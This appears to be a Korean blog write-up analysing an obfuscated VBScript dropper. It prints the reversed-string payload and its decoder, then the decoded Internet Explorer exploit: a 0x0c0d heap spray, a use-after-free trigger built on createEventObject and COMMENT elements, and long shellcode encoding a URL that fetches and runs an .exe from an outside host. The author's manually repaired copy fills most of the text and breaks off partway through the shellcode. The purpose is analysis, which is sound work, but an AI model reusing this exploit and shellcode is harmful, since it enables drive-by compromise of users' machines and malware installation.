

Vbscript Obfuscated

이번에 살펴볼 난독화는 vbscript로 작성된 것입니다. 실제로 실행되는 html 소스가 역순으로 저장되어 있고, 그 사이에 UTF-8로 표시되는 특수문자가 포함되어 있습니다.


실제로 이 코드는 실행되지 않고 오류가 발생하지만, 공격을 위한 소스코드이며 분석해볼 만큼 재미있는 형태이기 때문에 분석해 보았습니다.


<SCRIPT language=vbscript>
wei="มี>lmth/<>ydob/<>naps/<>"")tneve(1ve""=daolno ""fig.lty""=CRS GMI<>""1ps""=di naps<มี>tpircs/<มี}มี}มี;tnemelEcrs.1e = t rav มี;} มี;p = atad.]i[1x มี{ มี) ++ i ;htgnel.1x < i ;0 = i( rof มี;""d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\""=p {มี)(2ve noitcnufมี}มี;)05 ,2ve(lavretnItes.wodniw มี;"""" = LMTHrenni.)""1ps""(dIyBtnemelEteg.tnemucod มี;)tve(tcejbOtnevEetaerc.tnemucod = 1e มี{มี)tve(1ve noitcnufมี;llun = 1e ravมี;}มี;""cba"" = atad.]i[1x มี;)""TNEMMOC""(tnemelEetaerc.tnemucod = ]i[1x มี{มี) ++ i ;005 < i ;0 = i( rofมี;)(yarrA wen = 1x ravมี มี}มี;cs + n = ]i[x มี{) ++ i ;002 < i ;0 = i rav( rofมี;)(yarrA wen = x ravมี;)htgnel.cs - 962425 ,0(gnirtsbus.n = nมี;n =+ n)882425 =< htgnel.n( elihwมี;)""d0c0u%d0c0u%""(epacsenu = n ravมีมี;u+s=cs ravมี;)""0000u%8756u%E256u%F213u%5647u%E2E6u%7717u%7737u%F217u%A3F2u%4707u%8647u%""(TY=u 
ravมีมี;)pvaTY+""305Cu%40B8u%E3B8u%""(TY=+sมี;)""30DDu%A5C1u%E3B8u%C0B4u%E3B8u%DD66u%4230u%B8A5u%""+naittYUY+""FCD0u%701Cu%0C47u%""(TY=+sมีมี;)""CA48u%0CCFu%FF33u%5F33u%B830u%B843u%94E3u%3EB3u%30DDu%A502u%E3B8u%A481u%E3B8u%305Du%8287u%B845u%C363u%""(TY=+sมีมี;)""B854u%4263u%C642u%63B8u%3C06u%04C3u%E3B8u%0CC7u%4338u%B804u%B0E3u%3CBEu%0480u%E3B8u%C1DAu%B807u%C0E3u%""(TY=+sมี;)""B804u%01E3u%0C87u%0358u%B804u%0C46u%3C33u%4C80u%0038u%0000""+u_TY+""8EA2u%CE05u%E4E0u%86E8u%0000""+u_TY+""F000u%3C8Eu%""(TY=+sมี;)""4C80u%0038u%0000""+u_TY+""8EE3u%5005u%FEF4u%86F4u%FFFF""+u_TY+""9ADFu%3C8Eu%FFFF""+u_TY+""8EFFu%FF8Eu%CFFFu%9E5Bu%FFFF""+u_TY+""BAEFu%""(TY=+sมี;)""058Eu%FFFF""+u_TY+""0EBFu%058Eu%A656u%BE31u%FFFF""+u_TY+""44EFu%3C8Eu%4C80u%0038u%0000""+u_TY+""8E27u%6105u%EF3Bu%8627u%0000""+u_TY+""""(TY=+sมี;)""7500u%3C8Eu%4C80u%0038u%0000""+u_TY+""8E68u%3B05u%425Cu%8686u%FFFF""+u_TY+""24EFu%3C8Eu%4C80u%0038u%0000""+u_TY+""8EA9u%3A05u%""(TY=+sมีมี;)""9C2Eu%8679u%FFFF""+u_TY+""65EFu%3C8Eu%4C80u%0038u%0000""+u_TY+""8EEAu%4905u%B503u%860Eu%FFFF""+u_TY+""A6EFu%3C8Eu""+""%4C80u""+""%""+""0""+""0""+""3""+""8""+""u""+""%""(TY=+sมีมี;)""0""+""0""+""00u%8E2Cu%2005u%A7E1u%86A1u%FFFF""+u_TY+""E7EFu%3C8Eu%4C80u%0038u%0000""+u_TY+""8E6Du%BB05u%0A5Bu%8675u%FFFF""+u_TY+""29EFu%3C8Eu%""(TY=+s 
;)""4C80u%0038u%0000""+u_TY+""8EAEu%5305u%9FBBu%86E9u%0000""+u_TY+""FC00u%3C8Eu%4C80u%0038u%0000""+u_TY+""8EEFu%3705u%8D2Eu%86E7u%""(TY=+sมีมี;)""0000""+u_TY+""3E00u%3C8Eu%4C80u%0038u%1000u%8E21u%2005u%7918u%8695u%FFFF""+u_TY+""7AEFu%3C8Eu%4C80u%0038u%1000u%8E62u%""(TY=+sมีมี;)""E105u%E5B9u%86BAu%FFFF""+u_TY+""63FFu%3C8Eu%4C80u%0038u%1000u%8EA3u%BD05u%94D2u%860Bu%0000""+u_TY+""F110u%3C8Eu%4C80u%""(TY=+sมีมี;)""0038u%1000u%8EE4u%0605u%EC0Eu%86FEu%0000""+u_TY+""3310u%3C8Eu%4C80u%0038u%1000u%8E26u%C105u%86BDu%8687u%FFFF""+u_TY+""""(TY=+sมี;)""7FEFu%3C8Eu%4C80u%0038u%1000u%8E67u%F505u%A840u%860Fu%0000""+u_TY+""B510u%3C8Eu%4C80u%0038u%1000u%8EA8u%6305u%""(TY=+sมีมี;)""65FEu%86DEu%0000""+u_TY+""F610u%3C8Eu%4C80u%0038u%1000u%8EE9u%C705u%CFD0u%86AAu%0000""+u_TY+""3810u%3C8Eu%4C80u%0038u%""(TY=+sมีมี;)""1000u%8E2Bu%C005u%7930u%86CEu%0000""+u_TY+""7910u%3C8Eu%4C80u%0038u%1000u%8E6Cu%9705u%6C64u%86B1u%0000""+u_TY+""BA10u%""(TY=+sมีมี;)""3C8Eu%4C40u%FF38u%FFFF""+u_TY+""8E6Eu%FFFF""+u_TY+""04EFu%009Eu%1000u%8EAAu%FF05u%DFFFu%8EB6u%4005u%4442u%51D8u%00BEu%""(TY=+sมีมี;)""7687u%8667u%803Cu%384Cu%FFFF""+u_TY+""6EFFu%FF8Eu%EFFFu%9E56u%0000""+u_TY+""FC10u%058Eu%FFFF""+u_TY+""09DFu%058Eu%4240u%D844u%""(TY=+sมี;)""BE51u%46F6u%3786u%0086u%6777u%8636u%803Cu%384Cu%FFFF""+u_TY+""6EFFu%FF8Eu%EFFFu%9EF8u%0000""+u_TY+""9F10u%058Eu%FFFF""+u_TY+""""(TY=+sมี;)""ABDFu%058Eu%4240u%D844u%BE51u%5627u%5737u%0086u%2300u%8633u%803Cu%384Cu%FFFF""+u_TY+""6EFFu%FF8Eu%EFFFu%9E9Bu%""(TY=+sมี;)""0000""+u_TY+""3220u%058Eu%FFFF""+u_TY+""""+TYnaituy+""46C6u%E647u%C686u%3CA6u%4C80u%FF38u%FFFF""+u_TY+""8E6Eu%""(TY=+sมีมี;)""FFFF""+u_TY+""0EEFu%009Eu%2000u%8EA4u%FF05u%EFFFu%8EB0u%4005u%4442u%51D8u%D6BEu%27C6u%8657u%0000""+u_TY+""F6E6u%3C86u%""(TY=+sมี;)""0000""+u_TY+""1000u%E58Bu%01F5u%384Cu%FF0Du%0000""+u_TY+""FE10u%C18Eu%4742u%E3FFu%FF00u%02E3u%4442u%63B8u%4780u%B38Fu%""(TY=+sมี;)""FF0Du%0000""+u_TY+""BC10u%8F8Eu%0DB8u%00FFu%2000u%8E42u%4202u%FF47u%00E3u%F2A6u%6A57u%003Fu%0000""+u_TY+""9B80u%B84Fu%""(TY=+sมีมี;)
""6427u%9454u%0086u%D656u%8616u%B8CFu%FF0Du%0000""+u_TY+""D520u%418Eu%FF77u%75E3u%A680u%B8CFu%CE80u%7538u%FF65u%""(TY=+sมี;)""FFFF""+u_TY+""8E9Fu%853Cu%BE20u%B53Cu%E5F5u%0D85u%75FFu%33FFu%0000""+u_TY+""B020u%A08Eu%0077u%C342u%6308u%FF0Du%0000""+u_TY+""""(TY=+sมีมี;)""5520u%058Eu%0000""+u_TY+""E100u%458Eu%0C05u%6533u%3575u%FFFF""+u_TY+""1DEFu%0D8Eu%00FFu%0000""+u_TY+""86FFu%0000""+u_TY+""BF10u%0D8Eu%""(TY=+sมี;)""75FFu%33FFu%0000""+u_TY+""1420u%A08Eu%0077u%C342u%6308u%FF0Du%0000""+u_TY+""B820u%058Eu%0000""+u_TY+""4500u%458Eu%0C05u%FF33u%""(TY=+sมี;)""FFFF""+u_TY+""8E40u%C000u%082Cu%1040u%8B11u%FFFF""+u_TY+""11FFu%3C8Eu%FFFF""+u_TY+""71FFu%0E8Eu%50FFu%D804u%B8CEu%6055u%0947u%""(TY=+sมี;)""0""+""9""+""1""+""4""+""u%5009u%1887u%57F0u%838Eu%5008u%9E47u%0883u%FF0Du%3535u%3535u%33BDu%0000""+u_TY+""9330u%FF8Eu%FFFF""+u_TY+""0A06u%""(TY=+sมีมี;)""00D8u%0000""+u_TY+""1A40u%0046u%0000""+u_TY+""8E91u%""+VTMTY+""0505u%3505u%0015u%0000""+u_TY+""C210u%7C34u%""(TY=+sมีมี;)""0CE3u%0133u%383Cu%B89Du%B8CCu%BE2Fu%0C40u%8038u%98C1u%90E3u%45D7u%388Fu%B8CCu%33BDu%330Cu%CE45u%2038u%""(TY=+sมีมี;)""8805u%2DE3u%2233u%0022u%E37Cu%6F66u%04BEu%4730u%48BDu%A881u%80E3u%380Cu%B87Cu%B8CFu%0000""+u_TY+""2700u%008Eu%""(TY=+sมี;)""3000u%8E8Cu%3505u%0025u%1000u%8640u%0505u%330Cu%2C01u%2238u%3602u%C0F2u%7C24u%02E3u%D646u%8036u%7C24u%""(TY=+sมีมี;)""22E3u%3602u%40F2u%7C24u%02E3u%D646u%2036u%E37Cu%B84Du%0000""+u_TY+""4110u%18CEu%00B5u%4000u%9ECAu%0E3Cu%""(TY=+sมีมี;)""5""+""0""+""F""+""Fu%7C74u%66E3u%F510u%E398u%708Bu%E36Cu%3CB5u%FFF5u%D874u%2FEAu%3CCFu%0C0Bu%9433u%339Cu%B88Fu%0000""+u_TY+""3540u%758Eu%""(TY=+sมีมี;)""853Cu%0000""+u_TY+""2E00u%008Eu%2000u%8E0Bu%0075u%0100u%8600u%A602u%CD35u%35B8u%853Cu%0000""+u_TY+""AF00u%008Eu%2000u%8E8Cu%0075u%""(TY=+sมี;)""0100u%8600u%A604u%CD35u%35B8u%BE85u%0000""+u_TY+""A100u%008Eu%1000u%8E87u%0000""+u_TY+""C000u%8F8Eu%00B8u%3000u%8E0Au%0000""+u_TY+""0300u%""(TY=+sมี;)""008Eu%1000u%8EB5u%0000""+u_TY+""2200u%8F8Eu%00B8u%3000u%8E2Fu%0000""+u_TY+""6400u%008Eu%1000u%8E46
u%0000""+u_TY+""8300u%8F8Eu%00B8u%3000u%""(TY=+sมีมี;)""8E45u%FFFF""+u_TY+""6FFFu%0D8Eu%4AFFu%E53Fu%BE50u%B88Fu%0000""+u_TY+""0080u%0D9Bu%00FFu%00A6u%0200u%8600u%0000""+u_TY+""D430u%098Eu%""(TY=s ravมี;""FDE3u%8257u%C742u%63B3u%BE4Fu%308Fu%""=naittYUY ravมี;""4EDFu%058Eu%4240u%D844u%BE51u%""=TYnaituy ravมี;""0000""+u_TY+""B330u%058Eu%0575u%0505u%""=VTMTY ravมี;""FFFF""+u_TY+""F4BFu%3C8Eu%C116u%4442u%6398u%""=pvaTY ravมี;""u%""=u_TY ravมี;epacsenu=TY ravมี;)(gnirtSTMGot.seripxe+""=seripxe;/=htap;seY=FSevolTY""=eikooc.tnemucodมี;)0001*06*06*42+)(emiTteg.seripxe(emiTtes.seripxeมี;)(etaD wen=seripxe ravมีมี{มี)1-==)""=FSevolTY""(fOxedni.eikooc.tnemucod(fiมี};eurt nruter{)(noitcnuf=rorreno.wodniwมี>tpircs<>lmth<"
' Decodes the payload stored in wei: walks cc one character at a time and
' prepends each character to temp, so the result is cc reversed.
' cc: the obfuscated (reversed) string. Returns the reversed string.
' temp is never declared; with no Option Explicit it starts as Empty, so the
' first concatenation yields just the first character.
function UnEncode(cc)
for i = 1 to len(cc)
' NOTE(review): "มี" is two UTF-16 code units (ม plus the vowel sign ี), while
' Mid(cc,i,1) returns a single character, so this comparison is always true and
' the marker characters are copied through unchanged - which is why the markers
' survive into the output (the write-up's note 1 below).
if mid(cc,i,1)<>"มี" then
temp = Mid(cc, i, 1) + temp
else
' Intended to turn each marker into a line break; effectively never reached.
temp=vbcrlf&temp
end if
next
UnEncode=temp
end function
document.write(UnEncode(wei))
</SCRIPT>

มี 라는 문자는 구글 번역기로 돌려본 결과 "태국어 : 있다" 라는 의미를 가지고 있습니다.


간단하게 xmp 태그를 이용하여 난독화를 풀면 다음과 같은 결과를 볼 수 있습니다. vbscript이기 때문에 IE에서만 동작합니다.


<html><script>??window.onerror=function(){return true;}??if(document.cookie.indexOf("YTloveSF=")==-1)??{????var expires=new Date();??expires.setTime(expires.getTime()+24*60*60*1000);??document.cookie="YTloveSF=Yes;path=/;expires="+expires.toGMTString();??var YT=unescape;??var YT_u="%u";??var YTavp="%u8936%u2444%u611C%uE8C3%uFB4F"+YT_u+"FFFF";??var YTMTV="%u5050%u5750%uE850%u033B"+YT_u+"0000";??var yutianYT="%u15EB%u448D%u0424%uE850%uFDE4";??var YUYttian="%uF803%uF4EB%u3B36%u247C%u7528%u3EDF";??var s=YT("%uE890%u034D"+YT_u+"0000%u0068%u0020%u6A00%uFF00%uB9D0%u0800"+YT_u+"0000%uF88B%u05EB%uF35E%uFFA4%uE8D0%uFFF6"+YT_u+"FFFF%u54E8");????s+=YT("%u0003%u8B00%uE8F8%u0038"+YT_u+"0000%u64E8%u0001%uE800%u0046"+YT_u+"0000%uF2E8%u0003%u8B00%uE8F8%u0022"+YT_u+"0000%u5BE8%u0001%uE800");??s+=YT("%u0030"+YT_u+"0000%uA0E8%u0003%u8B00%uE8F8%u000C"+YT_u+"0000%u78E8%u0001%uE800%u001A"+YT_u+"0000%u58EB%u8B53%u53DC%u406A%u0068%u0010");??s+=YT("%u5700%uC8E8%u0002%uE800%u00FA"+YT_u+"0000%uC358%u8B53%u53DC%u206A%u0068%u0010%u5700%uB0E8%u0002%uE800%u00E2"+YT_u+"0000%uC358");????s+=YT("%uE857%u0453"+YT_u+"0000%uF88B%uC933%u3349%uB0C0%uFCC3%uAEF2%u478D%u5FFF%u5BC3%uC63E%uB807%u893E%u015F%u3E66%u47C7%uF"+"F"+"0"+"5");????s+=YT("%uC3E0%uACE9%u0004%u5B00%uEC81%u0114"+YT_u+"0000%uD48B%uC73E%u6302%u646D%u3E20%u42C7%u2F04%u2063%u3E22");????s+=YT("%u42C7%u6308%u646D%u3E20%u42C7%u2F0C%u2063%u8322%u10C2%uC033%u5050%u0468%u0001%u5200%u5053%uC8E8%u0003");??s+=YT("%uE800%u0072"+YT_u+"0000%uFC8B%uC78B%uC083%u3E08%u188A%uDB84%u0374%uEB40%u66F6%uC73E%u2200%u3322%u3ED2%u5088");????s+=YT("%u8302%u54EC%uC033%uDB33%uCC8B%uF883%u7D54%u3E09%u1C89%u8308%u04C0%uF2EB%uCC8B%uD98B%uC383%u3310%u3EC0");????s+=YT("%u43C7%u012C"+YT_u+"0000%u5100%u5053%u5050"+YTMTV+"%u19E8"+YT_u+"0000%u6400%u04A1"+YT_u+"0000%u8D00");????s+=YT("%u60A0"+YT_u+"FFFF%uE8FF%u0339"+YT_u+"0000%uDB33%u5353%u5353%uD0FF%u3880%u74E9%u8005%uE838%u0F75%u7881%u9005%u"+"4"+"1"+"9"+"0");??s+=YT("%u7490%u5506%uEC8B%u408D%uFF05%uE8E0%uFF17"+YT_u+"FFFF%uE8C3%
uFF11"+YT_u+"FFFF%u11B8%u0401%uC280%u000C%u04E8"+YT_u+"FFFF");??s+=YT("%u33FF%u50C0%uE854%u0054"+YT_u+"0000%uE850%u028B"+YT_u+"0000%uD0FF%u8036%u243C%u7700%uE80A%u0241"+YT_u+"0000%uFF33%uFF57");??s+=YT("%uE8D0%u01FB"+YT_u+"0000%uFF68"+YT_u+"0000%uFF00%uE8D0%uFED1"+YT_u+"FFFF%u5753%u3356%u50C0%uE854%u001E"+YT_u+"0000%uE850%u0255");????s+=YT(""+YT_u+"0000%uD0FF%u8036%u243C%u7700%uE80A%u020B"+YT_u+"0000%uFF33%uFF57%u58D0%u5F5E%uC35B%u02EB%uC358%uF9E8"+YT_u+"FFFF");??s+=YT("%u56FF%u8357%u08EC%uFC8B%u086A%u3E57%u77FF%uE814%u025D"+YT_u+"0000%uD0FF%uFC8B%u6168%u656D%u6800%u4549%u7246");????s+=YT("%uF48B%u08B9"+YT_u+"0000%uF300%u75A6%u6A2F%u3E00%u74FF%u2024%u24E8%u0002%uFF00%u8BD0%uE8F8%u01CB"+YT_u+"0000%uD0FF");??s+=YT("%uF83B%u0874%u8B36%u2444%u3E20%u00FF%uFF3E%u2474%uE81C%u01EF"+YT_u+"0000%uD0FF%uC483%u5F10%uB85E%u0001"+YT_u+"0000");??s+=YT("%u68C3%u6E6F"+YT_u+"0000%u7568%u6C72%uEB6D%u8D15%u2444%u5004%u0BE8%uFFFE%u50FF%u4AE8%u0002%uE900%uFEE0"+YT_u+"FFFF");????s+=YT("%uE6E8"+YT_u+"FFFF%u83FF%u08C4%u6AC3%u686C%u746E%u6C64"+yutianYT+""+YT_u+"FFFF%uE850%u0223"+YT_u+"0000");??s+=YT("%uB9E9%uFFFE%uE8FF%uFFE6"+YT_u+"FFFF%uC483%uC308%u3368%u0032%u6800%u7375%u7265%u15EB%u448D%u0424%uE850%uFDBA");??s+=YT(""+YT_u+"FFFF%uE850%u01F9"+YT_u+"0000%u8FE9%uFFFE%uE8FF%uFFE6"+YT_u+"FFFF%uC483%uC308%u6368%u7776%u6800%u6873%u6F64%u15EB");??s+=YT("%u448D%u0424%uE850%uFD90"+YT_u+"FFFF%uE850%u01CF"+YT_u+"0000%u65E9%uFFFE%uE8FF%uFFE6"+YT_u+"FFFF%uC483%uC308%u7668%u7867");????s+=YT("%uEB00%u8D15%u2444%u5004%u6BE8%uFFFD%u50FF%uAAE8%u0001%uE900%uFE40"+YT_u+"FFFF%uE6E8"+YT_u+"FFFF%u83FF%u04C4%uE8C3");????s+=YT("%u01AB"+YT_u+"0000%u1B68%u46C6%u5079%uC6E8%u0001%u8300%u08C4%uE8C3%u0197"+YT_u+"0000%uEC68%u0397%u500C%uB2E8%u0001");????s+=YT("%u8300%u08C4%uE8C3%u0183"+YT_u+"0000%uAA68%u0DFC%u507C%u9EE8%u0001%u8300%u08C4%uE8C3%u016F"+YT_u+"0000%uED68%uEF56");????s+=YT("%u5036%u8AE8%u0001%u8300%u08C4%uE8C3%u015B"+YT_u+"0000%uF068%u048A%u505F%u76E8%u0001%u8300%u08C4%uE8C3%uFEF7");??s+=YT(""+YT_u+"FFFF%u7868%
uDB68%u501C%u62E8%u0001%u8300%u08C4%uE8C3%u0133"+YT_u+"0000%uEF68%uE0CE%u5060%u4EE8%u0001%u8300");????s+=YT("%u08C4%uE8C3%u011F"+YT_u+"0000%uB068%u2D49%u50DB%u3AE8%u0001%u8300%u08C4%uE8C3%uFF36"+YT_u+"FFFF%uAB68%u9B5E%u501E");????s+=YT("%u26E8%u0001%u8300%u08C4%uE8C3%uFEA7"+YT_u+"FFFF%u5968%u8197%u5002%u12E8%u0001%u8300%u08C4%uE8C3%u00E3"+YT_u+"0000");????s+=YT("%u7E68%uE2D8%u5073%uFEE8"+YT_u+"0000%u8300%u08C4%uE8C3%u00CF"+YT_u+"0000%u9E68%uBBF9%u5035%uEAE8"+YT_u+"0000%u8300%u08C4"); s+=YT("%uE8C3%uFE92"+YT_u+"FFFF%u5768%uB5A0%u50BB%uD6E8"+YT_u+"0000%u8300%u08C4%uE8C3%uFE7E"+YT_u+"FFFF%u1A68%u1E7A%u5002%uC2E8%u00"+"0"+"0");????s+=YT("%"+"u"+"8"+"3"+"0"+"0"+"%"+"u08C4%"+"uE8C3%uFE6A"+YT_u+"FFFF%uE068%u305B%u5094%uAEE8"+YT_u+"0000%u8300%u08C4%uE8C3%uFE56"+YT_u+"FFFF%u9768%uE2C9");????s+=YT("%u50A3%u9AE8"+YT_u+"0000%u8300%u08C4%uE8C3%uFE42"+YT_u+"FFFF%u6868%uC524%u50B3%u86E8"+YT_u+"0000%u8300%u08C4%uE8C3%u0057");??s+=YT(""+YT_u+"0000%u7268%uB3FE%u5016%u72E8"+YT_u+"0000%u8300%u08C4%uE8C3%uFE44"+YT_u+"FFFF%u13EB%u656A%uE850%uFBE0"+YT_u+"FFFF%uE850");??s+=YT("%uFEAB"+YT_u+"FFFF%uB5E9%uFFFC%uE8FF%uFFE8"+YT_u+"FFFF%uE8C3%uFDA9"+YT_u+"FFFF%u4F68%u4FEF%u5005%u3EE8"+YT_u+"0000%u8300%u08C4");??s+=YT("%uE8C3%u000F"+YT_u+"0000%u8E68%u0E4E%u50EC%u2AE8"+YT_u+"0000%u8300%u08C4%u33C3%u64C0%u408B%u8530%u78C0%u3E10%u408B");??s+=YT("%u3E0C%u708B%uAD1C%u8B3E%u0840%uEBC3%u3E0B%u408B%u8334%u7CC0%u8B3E%u3C40%u60C3%u8B36%u246C%u3624%u458B");????s+=YT("%u363C%u548B%u7828%uD503%u8B3E%u184A%u8B3E%u205A%uDD03%u3BE3%u3E49%u348B%u038B%u33F5%u33FF%uFCC0%u84AC");????s+=YT("%u74C0%uC107%u0DCF"+YUYttian+"%u5A8B%u0324%u66DD%u8B3E%u4B0C%u8B3E%u1C5A%uDD03");??s+=YT("%u8B3E%u8B04%uC503"+YTavp);????var u=YT("%u7468%u7074%u2F3A%u712F%u7377%u7177%u6E2E%u7465%u312F%u652E%u6578%u0000");??var sc=s+u;????var n = unescape("%u0c0d%u0c0d");??while (n.length <= 524288)n += n;??n = n.substring(0, 524269 - sc.length);??var x = new Array();??for (var i = 0; i < 200; i ++ ){?? x[i] = n + sc;??}?? 
??var x1 = new Array();??for (i = 0; i < 500; i ++ )??{?? x1[i] = document.createElement("COMMENT");?? x1[i].data = "abc";??};??var e1 = null;??function ev1(evt)??{?? e1 = document.createEventObject(evt);?? document.getElementById("sp1").innerHTML = "";?? window.setInterval(ev2, 50);??}??function ev2()??{ p="\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d";?? for (i = 0; i < x1.length; i ++ )?? {?? x1[i].data = p;?? };?? var t = e1.srcElement;??}??}??</script>??<span id="sp1"><IMG SRC="ytl.gif" onload="ev1(event)"></span></body></html>??

1. มี(UTF-8 문제로 ??로 표시됨)를 제거하는 구문이 존재하지 않음. 수동으로 제거.

2. YT_u 변수는 "%u"를 의미함.

3. 실행에 있어 잘못된 부분들 일부 수정


위 세 조건을 수동으로 처리하면 다음과 같은 결과가 나옵니다.

<html>
    <script>
    window.onerror = function () { 
    return true; 
    }
     if (document.cookie.indexOf("YTloveSF=") == -1)
     {
         var expires = new Date();
         expires.setTime(expires.getTime() + 24 * 60 * 60 * 1000);
         document.cookie = "YTloveSF=Yes";
         path=/;expires=expires.toGMTString();/
         var YT = unescape; 
         var YTavp ="%u8936%u2444%u611C%uE8C3%uFB4F%uFFFF";
         var YTMTV = "%u5050%u5750%uE850%u033B%u0000";
         var yutianYT = "%u15EB%u448D%u0424%uE850%uFDE4";
         var YUYttian = "%uF803%uF4EB%u3B36%u247C%u7528%u3EDF";
         var s = YT("%uE890%u034D%u0000%u0068%u0020%u6A00%uFF00%uB9D0%u0800%u0000%uF88B%u05EB%uF35E%uFFA4%uE8D0%uFFF6%uFFFF%u54E8");
         s += YT("%u0003%u8B00%uE8F8%u0038%u0000%u64E8%u0001%uE800%u0046%u0000%uF2E8%u0003%u8B00%uE8F8%u0022%u0000%u5BE8%u0001%uE800");
         s += YT("%u0030%u0000%uA0E8%u0003%u8B00%uE8F8%u000C%u0000%u78E8%u0001%uE800%u001A%u0000%u58EB%u8B53%u53DC%u406A%u0068%u0010");
         s += YT("%u5700%uC8E8%u0002%uE800%u00FA%u0000%uC358%u8B53%u53DC%u206A%u0068%u0010%u5700%uB0E8%u0002%uE800%u00E2%u0000%uC358");
         s += YT("%uE857%u0453%u0000%uF88B%uC933%u3349%uB0C0%uFCC3%uAEF2%u478D%u5FFF%u5BC3%uC63E%uB807%u893E%u015F%u3E66%u47C7%uFF05");
         s += YT("%uC3E0%uACE9%u0004%u5B00%uEC81%u0114%u0000%uD48B%uC73E%u6302%u646D%u3E20%u42C7%u2F04%u2063%u3E22");
         s += YT("%u42C7%u6308%u646D%u3E20%u42C7%u2F0C%u2063%u8322%u10C2%uC033%u5050%u0468%u0001%u5200%u5053%uC8E8%u0003");
         s += YT("%uE800%u0072%u0000%uFC8B%uC78B%uC083%u3E08%u188A%uDB84%u0374%uEB40%u66F6%uC73E%u2200%u3322%u3ED2%u5088");
         s += YT("%u8302%u54EC%uC033%uDB33%uCC8B%uF883%u7D54%u3E09%u1C89%u8308%u04C0%uF2EB%uCC8B%uD98B%uC383%u3310%u3EC0");
         s += YT("%u43C7%u012C%u0000%u5100%u5053%u5050"+YTMTV+"%u19E8%u0000%u6400%u04A1%u0000%u8D00");
         s += YT("%u60A0%uFFFF%uE8FF%u0339%u0000%uDB33%u5353%u5353%uD0FF%u3880%u74E9%u8005%uE838%u0F75%u7881%u9005%u4190");
         s += YT("%u7490%u5506%uEC8B%u408D%uFF05%uE8E0%uFF17%uFFFF%uE8C3%uFF11%uFFFF%u11B8%u0401%uC280%u000C%u04E8%uFFFF");
         s += YT("%u33FF%u50C0%uE854%u0054%u0000%uE850%u028B%u0000%uD0FF%u8036%u243C%u7700%uE80A%u0241%u0000%uFF33%uFF57");
         s += YT("%uE8D0%u01FB%u0000%uFF68%u0000%uFF00%uE8D0%uFED1%uFFFF%u5753%u3356%u50C0%uE854%u001E%u0000%uE850%u0255");
         s += YT("%u0000%uD0FF%u8036%u243C%u7700%uE80A%u020B%u0000%uFF33%uFF57%u58D0%u5F5E%uC35B%u02EB%uC358%uF9E8%uFFFF");
         s += YT("%u56FF%u8357%u08EC%uFC8B%u086A%u3E57%u77FF%uE814%u025D%u0000%uD0FF%uFC8B%u6168%u656D%u6800%u4549%u7246");
         s += YT("%uF48B%u08B9%u0000%uF300%u75A6%u6A2F%u3E00%u74FF%u2024%u24E8%u0002%uFF00%u8BD0%uE8F8%u01CB%u0000%uD0FF");
         s += YT("%uF83B%u0874%u8B36%u2444%u3E20%u00FF%uFF3E%u2474%uE81C%u01EF%u0000%uD0FF%uC483%u5F10%uB85E%u0001%u0000");
         s += YT("%u68C3%u6E6F%u0000%u7568%u6C72%uEB6D%u8D15%u2444%u5004%u0BE8%uFFFE%u50FF%u4AE8%u0002%uE900%uFEE0%uFFFF");
         s += YT("%uE6E8%uFFFF%u83FF%u08C4%u6AC3%u686C%u746E%u6C64"+yutianYT+"%uFFFF%uE850%u0223%u0000");
         s += YT("%uB9E9%uFFFE%uE8FF%uFFE6%uFFFF%uC483%uC308%u3368%u0032%u6800%u7375%u7265%u15EB%u448D%u0424%uE850%uFDBA");
         s += YT("%uFFFF%uE850%u01F9%u0000%u8FE9%uFFFE%uE8FF%uFFE6%uFFFF%uC483%uC308%u6368%u7776%u6800%u6873%u6F64%u15EB");
         s += YT("%u448D%u0424%uE850%uFD90%uFFFF%uE850%u01CF%u0000%u65E9%uFFFE%uE8FF%uFFE6%uFFFF%uC483%uC308%u7668%u7867");
         s += YT("%uEB00%u8D15%u2444%u5004%u6BE8%uFFFD%u50FF%uAAE8%u0001%uE900%uFE40%uFFFF%uE6E8%uFFFF%u83FF%u04C4%uE8C3");
         s += YT("%u01AB%u0000%u1B68%u46C6%u5079%uC6E8%u0001%u8300%u08C4%uE8C3%u0197%u0000%uEC68%u0397%u500C%uB2E8%u0001");
         s += YT("%u8300%u08C4%uE8C3%u0183%u0000%uAA68%u0DFC%u507C%u9EE8%u0001%u8300%u08C4%uE8C3%u016F%u0000%uED68%uEF56");
         s += YT("%u5036%u8AE8%u0001%u8300%u08C4%uE8C3%u015B%u0000%uF068%u048A%u505F%u76E8%u0001%u8300%u08C4%uE8C3%uFEF7");
         s += YT("%uFFFF%u7868%uDB68%u501C%u62E8%u0001%u8300%u08C4%uE8C3%u0133%u0000%uEF68%uE0CE%u5060%u4EE8%u0001%u8300");
         s += YT("%u08C4%uE8C3%u011F%u0000%uB068%u2D49%u50DB%u3AE8%u0001%u8300%u08C4%uE8C3%uFF36%uFFFF%uAB68%u9B5E%u501E");
         s += YT("%u26E8%u0001%u8300%u08C4%uE8C3%uFEA7%uFFFF%u5968%u8197%u5002%u12E8%u0001%u8300%u08C4%uE8C3%u00E3%u0000");
         s += YT("%u7E68%uE2D8%u5073%uFEE8%u0000%u8300%u08C4%uE8C3%u00CF%u0000%u9E68%uBBF9%u5035%uEAE8%u0000%u8300%u08C4");
         s += YT("%uE8C3%uFE92%uFFFF%u5768%uB5A0%u50BB%uD6E8%u0000%u8300%u08C4%uE8C3%uFE7E%uFFFF%u1A68%u1E7A%u5002%uC2E8%u0000");
         s += YT("%u8300%u08C4%uE8C3%uFE6A%uFFFF%uE068%u305B%u5094%uAEE8%u0000%u8300%u08C4%uE8C3%uFE56%uFFFF%u9768%uE2C9");
